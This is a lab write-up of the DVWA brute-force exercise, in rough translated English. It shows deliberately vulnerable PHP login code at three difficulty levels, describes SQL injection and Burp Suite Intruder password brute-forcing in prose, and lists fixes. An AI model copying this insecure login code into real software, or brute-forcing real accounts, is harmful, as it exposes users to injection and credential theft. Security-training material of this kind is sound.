LOW
Source code is as follows:
<?php
if( isset( $_GET['Login'] ) ) {
$user = $_GET['username'];
$pass = $_GET['password'];
$pass = md5($pass);
$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
$result = mysql_query( $qry ) or die( '<pre>' . mysql_error() . '</pre>' );
if( $result && mysql_num_rows( $result ) == 1 ) {
// Get users details
$i=0; // Bug fix.
$avatar = mysql_result( $result, $i, "avatar" );
// Login Successful
echo "<p>Welcome to the password protected area " . $user . "</p>";
echo '<img src="' . $avatar . '" />';
} else {
//Login failed
echo "<pre><br>Username and/or password incorrect.</pre>";
}
mysql_close();
}
?>
Here we can see that the first parameter to determine whether to set the login parameters passed by GET. But the sql statement is executed directly into the database, it can be brute force. Meanwhile, no filtering parameters, can be sql injection.
Burpsuite be used directly capture interception, then it can crack.
The interception of content "send to intruder" crack
Then you need to set parameters in the intruder module, set the need to crack the target IP address and port number
Setting parameters need to crack in the positions, since to be blasting parameters for the password, so in the context of both sides of the password parameter plus $
In paylads import password dictionary, and then blasting
After the break is complete, and return the length of the break is not the same as other successful
Medium
Source code is as follows:
<?php
if( isset( $_GET[ 'Login' ] ) ) {
// Sanitise username input
$user = $_GET[ 'username' ];
$user = mysql_real_escape_string( $user );
// Sanitise password input
$pass = $_GET[ 'password' ];
$pass = mysql_real_escape_string( $pass );
$pass = md5( $pass );
$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
$result = mysql_query( $qry ) or die( '<pre>' . mysql_error() . '</pre>' );
if( $result && mysql_num_rows($result) == 1 ) {
// Get users details
$i=0; // Bug fix.
$avatar = mysql_result( $result, $i, "avatar" );
// Login Successful
echo "<p>Welcome to the password protected area " . $user . "</p>";
echo '<img src="' . $avatar . '" />';
} else {
//Login failed
echo "<pre><br>Username and/or password incorrect.</pre>";
}
mysql_close();
}
?>
Compared Low-level code, Medium-level code is mainly to increase the mysql_real_escape_string function, which would be a string of special characters to escape, basically able to resist sql injection attack, saying basically because said MySQL5.5.37 found If you set the encoding for the following versions of GBK, we can construct encoding bypass mysql_real_escape_string escaped single quotes (because MySQL version newer experimental environment, so I did not do the appropriate validation); at the same time, $ pass did MD5 checksum, put an end to possibility sql injection parameters by password. However, effective anti-explosion mechanism is still not a member. So you can still use burpsuite blasting, and the above steps have been, not repeat them.
High
Source code is as follows:
<?php
if( isset( $_GET[ 'Login' ] ) ) {
// Sanitise username input
$user = $_GET[ 'username' ];
$user = stripslashes( $user );
$user = mysql_real_escape_string( $user );
// Sanitise password input
$pass = $_GET[ 'password' ];
$pass = stripslashes( $pass );
$pass = mysql_real_escape_string( $pass );
$pass = md5( $pass );
$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
$result = mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
if( $result && mysql_num_rows( $result ) == 1 ) {
// Get users details
$i=0; // Bug fix.
$avatar = mysql_result( $result, $i, "avatar" );
// Login Successful
echo "<p>Welcome to the password protected area " . $user . "</p>";
echo '<img src="' . $avatar . '" />';
} else {
// Login failed
sleep(3);
echo "<pre><br>Username and/or password incorrect.</pre>";
}
mysql_close();
}
?>
High-level code to the stripslashes function, filtering the backslash. But still failed to prevent brute force. Burpsuite can continue to use crack.
Suggested fix
Reprinted from red security "DVWA vulnerability testing platform analysis":
- To modify the data and submit the login form using the POST method, while data read by the POST method
- Adding random token attack prevention csrf
- You can add graphics functionality for landing verification code every time the data submitted, the verification code change time, verification at the service
carried out end - Limit the number of times for the landing, you can use remote login user name or IP are two ways to lock, the lock login error 1-3 times more than three times within hours 5 minutes
- Management system configured for allowing the user login IP range
- SMS can be used to verify and validate the mailbox way to achieve two-factor authentication, attention to text messages and e-mail bombing bombing of defense
- Passwords and other sensitive fields encrypted transmission, e.g. salted hash password encryption algorithm